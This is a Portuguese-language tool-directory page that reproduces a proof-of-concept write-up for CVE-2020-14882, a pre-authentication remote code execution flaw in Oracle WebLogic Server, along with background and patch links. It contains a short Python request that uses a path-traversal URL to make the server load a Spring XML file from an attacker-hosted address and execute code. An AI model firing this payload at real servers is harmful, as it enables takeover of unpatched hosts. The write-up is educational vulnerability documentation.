Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-14882 — Assunção do Oracle WebLogic Server | Kitploit
Ferramentas/GitHubGitHub/lucaspdiniz/cve-2020-14882
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHublucaspdiniz/cve-2020-14882

CVE-2020-14882

Assunção do Oracle WebLogic Server

Ver Repositório
11há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade RCE no WebLogic - CVE-2020-14882

  • Introdução

CVE-2020-14882 é uma falha de execução remota de código (RCE) no componente Console do Oracle WebLogic Server. A falha de pré-autenticação recebeu uma complexidade de ataque “baixa” e foi destacada como “facilmente explorável” pela Oracle, resultando na atribuição de uma pontuação CVSSv3 crítica de 9.8. A exploração bem-sucedida permitiria que um atacante não autenticado comprometesse o servidor Oracle WebLogic via HTTP e assumisse o controle total do host. (Mais informações - Tenable)

  • Pontuação de Gravidade - CVSS 3 ⚠️


As versões suportadas afetadas são 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 e 14.1.1.0.0.

Explorando - POC ❗

Ambiente 💻

Vítima (Servidor WebLogic): 192.168.0.15 - Windows 10 PRO executando o Servidor WebLogic.
Atacante (Arquivo XML hospedado): 192.168.0.16 - Kali Linux - GNU/Linux - Debian.

  1. Para o primeiro passo, vamos criar um arquivo python que explorará a vulnerabilidade no weblogic.

Baixar ferramenta

Payload:

root@kitploit:~
import requests
url = http://{}:{}/console/images/%252E%252E%252Fconsole.portal' \
		'?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext' \
		'(%22http://192.168.0.16:8000/Documents/teste.xml%22)'.format('192.168.0.15', '7001')
response = requests.get(url)

Este payload chamará uma biblioteca XML do spring framework para enviar uma solicitação a um servidor no domínio do atacante procurando pelo arquivo teste.xml.

  1. Precisamos preparar o arquivo XML que será chamado pela vítima. Criamos uma estrutura XML padrão, no entanto, incluímos o framework e os campos de valor são importantes nesta etapa porque serão executados na vítima. Para este exemplo, estamos chamando o arquivo da calculadora do Windows.

  1. No host do atacante, precisamos criar um servidor com o arquivo XML para ser solicitado pela vítima. Para facilitar, usamos nosso próprio servidor python http.server.

  1. Iniciando o ataque 🎯. Iniciamos o script do passo 1, Nesta etapa, conseguimos identificar o log das chamadas do arquivo XML sendo feitas pela vítima

  1. RCE executado com sucesso 💥. No lado da vítima, é possível visualizar a execução remota (RCE) da calculadora do windows

Conclusão

Em 28 de outubro, o pesquisador de segurança chamado Jang publicou uma postagem no blog (em vietnamita) sobre o CVE-2020-14882, incluindo detalhes parciais que poderiam ser usados para um PoC. Jang não é estranho às falhas do WebLogic, sendo creditado pela descoberta e relato do CVE-2020-2555 à Oracle, que corrigiu a vulnerabilidade no CPU de janeiro de 2020. Em março, Jang confirmou que o CVE-2020-2555 não foi completamente corrigido. O bypass para o CVE-2020-2555 foi divulgado por outro pesquisador, Quynh Le, do VNPT Information Security Center (ISC). Tanto Le quanto Jang são creditados por reportar esse bypass, que é identificado como CVE-2020-2883. (Mais informações - Tenable)

Alguns links para ajudar a corrigir

  • Oracle WebLogic: CVE-2020-14882 : Atualização Crítica de Patch (Doc ID 2771503.1). (Suporte Oracle)

  • Oracle Critical Patch Update Advisory - Outubro de 2020. (Suporte Oracle)

  • Como Mitigar o Impacto do CVE-2020-14882 Weblogic. (Suporte Oracle)

  • Vulnerabilidade no produto Oracle WebLogic Server do Oracle Fusion Middleware. (Mitre - CVE)

Vulnerabilidade Corrigida ✅